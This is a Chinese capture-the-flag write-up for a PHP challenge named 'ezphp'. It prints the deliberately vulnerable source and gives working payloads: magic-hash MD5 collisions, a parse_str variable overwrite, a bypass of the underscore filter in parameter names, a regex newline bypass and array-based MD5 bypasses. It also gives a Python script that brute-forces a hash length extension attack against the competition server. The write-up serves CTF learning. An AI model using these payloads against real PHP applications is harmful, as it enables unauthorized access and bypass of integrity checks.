1. ezphp
<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
$a = 'O.U.C';
$query = $_SERVER['QUERY_STRING'];
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
die('听说你是黑客');
}
echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
echo "哎呦,不错喔".'<br>';
$O_U_C=$_GET['O_U_C'];
if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
echo '好,那么好'.'<br>';
if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
}else{
echo '告诉你secret的md5值也无妨,反正哈希是不可逆的๑乛◡乛๑,除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
}
}else{
echo '不过如此';
}
}else{
die("不行嘛(´ェ`)");
}
}else{
echo '嗨害嗨 (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}
考了一堆的php特性,心累。
第一关(变量覆盖)
关键代码如下:
$a = 'O.U.C';
... # 省略一堆代码
$query = $_SERVER['QUERY_STRING'];
parse_str($query);
... # 省略一堆代码
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
echo "哎呦,不错喔".'<br>';
... # 省略一堆代码
变量覆盖,找俩不同且满足md5加密后以0e开头的字符串,如下:
?a=QNKCDZO&b=240610708
成功绕过,如图。
第二关(传参名特性、preg_match绕过)
关键代码如下:
... # 省略一堆代码
$query = $_SERVER['QUERY_STRING'];
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
die('听说你是黑客');
}
... # 省略一堆代码
if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
... # 省略一堆代码
由于对变量名存在过滤,即变量名中不能出现下划线以及点号,此时我们可以利用加号绕过。同时,在非多行匹配的情况下,preg_match()函数会忽略结尾的换行符,Payload如下:
?O+U+C=100%0a
成功绕过,如图。
第三关(md5绕过、哈希长度扩展攻击)
关键代码如下:
... # 省略一堆代码
if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
echo '好,那么好'.'<br>';
if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
}else{
echo '告诉你secret的md5值也无妨,反正哈希是不可逆的๑乛◡乛๑,除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
}
... # 省略一堆代码
第一层if利用数组绕过,Payload如下:
md51[]=1&md52[]=2
成功绕过,如图。
第二层if使用哈希长度攻击绕过,利用hash_ext_attack工具,在key长度未知的情况下可以暴破,利用脚本如下:
import requests
import urllib.parse
from hash_ext_attack import HashExtAttack
# POST参数
data = {
'md51[]': 1,
'md52[]': 2
}
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'https://127.0.0.1:8080'
}
hash_ext_attack = HashExtAttack()
for len in range(1, 101):
print("times:" + str(len))
new_text,new_hash = hash_ext_attack.run('ouc', '06d92f344c7d8c89cb164353ca0fa070', 'zue3r', len)
new_text = urllib.parse.quote(new_text, safe='&=')
url = f'http://7153f08b-73b5-46c8-92e7-b3f3afed6725.competition.blue-whale.me:20001/ezPHP.php?a=QNKCDZO&b=240610708&O+U+C=100%0a&md5={new_text}'
# print(new_text)
# COOKIE参数
headers = {
'Cookie': f'md5={new_hash}'
}
res = requests.post(url=url,data=data,proxies=proxies, headers=headers)
print(res.text)
运行该脚本,在key的长度等于15的情况下可以输出flag,如图。